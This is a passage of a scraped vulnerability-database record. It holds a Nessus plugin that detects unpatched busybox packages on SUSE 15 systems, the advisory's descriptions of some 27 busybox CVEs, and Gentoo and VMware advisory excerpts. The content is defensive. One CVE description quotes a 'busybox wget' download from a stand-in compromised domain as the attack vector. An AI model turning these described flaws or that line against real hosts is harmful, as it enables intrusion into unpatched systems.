SUSE-SU-2022:0135-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156924);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\n \"CVE-2011-5325\",\n \"CVE-2015-9261\",\n \"CVE-2016-2147\",\n \"CVE-2016-2148\",\n \"CVE-2016-6301\",\n \"CVE-2017-15873\",\n \"CVE-2017-15874\",\n \"CVE-2017-16544\",\n \"CVE-2018-20679\",\n \"CVE-2018-1000500\",\n \"CVE-2018-1000517\",\n \"CVE-2019-5747\",\n \"CVE-2021-28831\",\n \"CVE-2021-42373\",\n \"CVE-2021-42374\",\n \"CVE-2021-42375\",\n \"CVE-2021-42376\",\n \"CVE-2021-42377\",\n \"CVE-2021-42378\",\n \"CVE-2021-42379\",\n \"CVE-2021-42380\",\n \"CVE-2021-42381\",\n \"CVE-2021-42382\",\n \"CVE-2021-42383\",\n \"CVE-2021-42384\",\n \"CVE-2021-42385\",\n \"CVE-2021-42386\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:0135-1\");\n script_xref(name:\"IAVA\", value:\"2019-A-0344\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : busybox (SUSE-SU-2022:0135-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2022:0135-1 advisory.\n\n - Directory traversal vulnerability in the BusyBox implementation of tar before 1.22.0 v5 allows remote\n attackers to point to files outside the current working directory via a symlink. (CVE-2011-5325)\n\n - huft_build in archival/libarchive/decompress_gunzip.c in BusyBox before 1.27.2 misuses a pointer, causing\n segfaults and an application crash during an unzip operation on a specially crafted ZIP file.\n (CVE-2015-9261)\n\n - Integer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to cause a\n denial of service (crash) via a malformed RFC1035-encoded domain name, which triggers an out-of-bounds\n heap write. (CVE-2016-2147)\n\n - Heap-based buffer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to\n have unspecified impact via vectors involving OPTION_6RD parsing. (CVE-2016-2148)\n\n - The recv_and_process_client_pkt function in networking/ntpd.c in busybox allows remote attackers to cause\n a denial of service (CPU and bandwidth consumption) via a forged NTP packet, which triggers a\n communication loop. (CVE-2016-6301)\n\n - The get_next_block function in archival/libarchive/decompress_bunzip2.c in BusyBox 1.27.2 has an Integer\n Overflow that may lead to a write access violation. (CVE-2017-15873)\n\n - archival/libarchive/decompress_unlzma.c in BusyBox 1.27.2 has an Integer Underflow that leads to a read\n access violation. (CVE-2017-15874)\n\n - In the add_match function in libbb/lineedit.c in BusyBox through 1.27.2, the tab autocomplete feature of\n the shell, used to get a list of filenames in a directory, does not sanitize filenames and results in\n executing any escape sequence in the terminal. This could potentially result in code execution, arbitrary\n file writes, or other attacks. (CVE-2017-16544)\n\n - Busybox contains a Missing SSL certificate validation vulnerability in The busybox wget applet that can\n result in arbitrary code execution. This attack appear to be exploitable via Simply download any file over\n HTTPS using busybox wget https://compromised-domain.com/important-file. (CVE-2018-1000500)\n\n - BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a\n Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear\n to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit\n 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e. (CVE-2018-1000517)\n\n - An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by\n the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack\n by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in\n networking/udhcp/common.c that 4-byte options are indeed 4 bytes. (CVE-2018-20679)\n\n - An issue was discovered in BusyBox through 1.30.0. An out of bounds read in udhcp components (consumed by\n the DHCP server, client, and/or relay) might allow a remote attacker to leak sensitive information from\n the stack by sending a crafted DHCP message. This is related to assurance of a 4-byte length when decoding\n DHCP_SUBNET. NOTE: this issue exists because of an incomplete fix for CVE-2018-20679. (CVE-2019-5747)\n\n - decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer,\n with a resultant invalid free or segmentation fault, via malformed gzip data. (CVE-2021-28831)\n\n - A NULL pointer dereference in Busybox's man applet leads to denial of service when a section name is\n supplied but no page argument is given (CVE-2021-42373)\n\n - An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when\n crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that\n (CVE-2021-42374)\n\n - An incorrect handling of a special element in Busybox's ash applet leads to denial of service when\n processing a crafted shell command, due to the shell mistaking specific characters for reserved\n characters. This may be used for DoS under rare conditions of filtered command input. (CVE-2021-42375)\n\n - A NULL pointer dereference in Busybox's hush applet leads to denial of service when processing a crafted\n shell command, due to missing validation after a \\x03 delimiter character. This may be used for DoS under\n very rare conditions of filtered command input. (CVE-2021-42376)\n\n - An attacker-controlled pointer free in Busybox's hush applet leads to denial of service and possible code\n execution when processing a crafted shell command, due to the shell mishandling the &&& string. This may\n be used for remote code execution under rare conditions of filtered command input. (CVE-2021-42377)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the getvar_i function (CVE-2021-42378)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the next_input_file function (CVE-2021-42379)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the clrvar function (CVE-2021-42380)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the hash_init function (CVE-2021-42381)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the getvar_s function (CVE-2021-42382)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the evaluate function (CVE-2021-42383, CVE-2021-42385)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the handle_special function (CVE-2021-42384)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the nvalloc function (CVE-2021-42386)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/951562\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/970662\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/970663\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/991940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1064976\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1064978\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1069412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1099260\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1099263\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1102912\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1121426\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1121428\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1184522\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1192869\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-January/010031.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db7ab088\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2011-5325\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-9261\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-2147\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-2148\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-6301\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-15873\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-15874\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-16544\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000500\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000517\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-20679\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-5747\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-28831\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42373\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42374\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42375\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42376\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42377\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42378\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42379\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42380\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42381\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42382\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42383\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42384\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42385\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42386\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected busybox and / or busybox-static packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1000517\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:busybox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:busybox-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1|2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1/2/3\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15.1'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15.1'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15.2'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15.2'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-1'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-1'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-1'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-1'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-2'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-2'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-2'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-2'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.1'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.1'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.1'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.1'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.2'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.2'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.2'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.2'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15.1'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15.1'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15.2'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15.2'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-15.1'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-15.1'},\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-15.2'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-15.2'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'busybox / busybox-static');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:04:30", "description": "### Background\n\nBusyBox is a set of tools for embedded systems and is a replacement for GNU Coreutils. \n\n### Description\n\nMultiple vulnerabilities have been discovered in BusyBox. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or have other unspecified impacts. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll BusyBox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-apps/busybox-1.28.0\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-03-26T00:00:00", "type": "gentoo", "title": "BusyBox: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15873", "CVE-2017-15874", "CVE-2017-16544"], "modified": "2018-03-26T00:00:00", "id": "GLSA-201803-12", "href": "https://security.gentoo.org/glsa/201803-12", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2019-11-06T16:05:15", "description": "##### 1\\. Impacted Products\n\n * VMware vSphere ESXi (ESXi) \n\n * VMware vCenter Server (vCenter) \n\n\n##### 2\\. Introduction\n\n###### ESXi and vCenter updates address multiple vulnerabilities.\n\n * CVE-2017-16544: VMware ESXi command injection vulnerability\n * CVE-2019-5531: ESXi Host Client, vCenter vSphere Client and vCenter vSphere Web Client information disclosure vulnerability\n * CVE-2019-5532: VMware vCenter Server information disclosure vulnerability\n * CVE-2019-5534: VMware vCenter Server Information disclosure vulnerability in vAppConfig properties\n\n###### \n\n##### 3a. VMware ESXi 'busybox' command injection vulnerability- CVE-2017-16544 \n\n\n**Description: \n**\n\nESXi contains a command injection vulnerability due to the use of vulnerable version of busybox that does not sanitize filenames which may result into executing any escape sequence in the shell. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [6.7](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H>).\n\n**Known Attack Vectors:**\n\nAn attacker may exploit this issue by tricking an ESXi Admin into executing shell commands by providing a malicious file. \n\n\n**Resolution:**\n\nTo remediate CVE-2017-16544 update/upgrade to the versions listed in the 'Fixed Version' column of the 'Resolution Matrix' found below. \n\n\n**Workarounds:**\n\nNone.\n\n**Additional Documentations:**\n\nNone.\n\n**Acknowledgements:**\n\nVMware would like to thank Zhouyuan Yang of Fortinet's FortiGuard Labs for notifying about this issue to us. \n\n\n**Response Matrix:**\n", "cvss3": {}, "published": "2019-09-16T00:00:00", "type": "vmware", "title": "VMware ESXi and vCenter Server updates address\u00a0command injection and\u00a0information disclosure\u00a0vulnerabilities. (CVE-2017-16544,\u00a0CVE-2019-5531,\u00a0CVE-2019-5532,\u00a0CVE-2019-5534)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2019-5531", "CVE-2019-5534", "CVE-2019-5532", "CVE-2017-16544"], "modified": "2019-09-19T00:00:00", "id": "VMSA-2019-0013", "href": "https://www.vmware.com/security/advisories/VMSA-2019-0013.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-26T00:56:21", "description": "3a. VMware ESXi 'busybox' command injection vulnerability- CVE-2017-16544 \n\nESXi contains a command injection vulnerability due to the use of vulnerable version of busybox that does not sanitize filenames which may result into executing any escape sequence in the shell. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.7.\n\n3b. ESXi Host Client, vCenter vSphere Client and vCenter vSphere Web Client information disclosure vulnerability- CVE-2019-5531 \n\nAn information disclosure vulnerability in clients arising from insufficient session expiration. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.2.\n\n3c. VMware vCenter Server information disclosure vulnerability- CVE-2019-5532 \n\nVMware vCenter Server contains an information disclosure vulnerability due to the logging of credentials in plain-text for virtual machines deployed through OVF. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.7. \n\n3d. Information disclosure vulnerability in vAppConfig properties - CVE-2019-5534 \n\nVirtual Machines deployed from an OVF could expose login information via the virtual machine's vAppConfig properties. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.7.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": 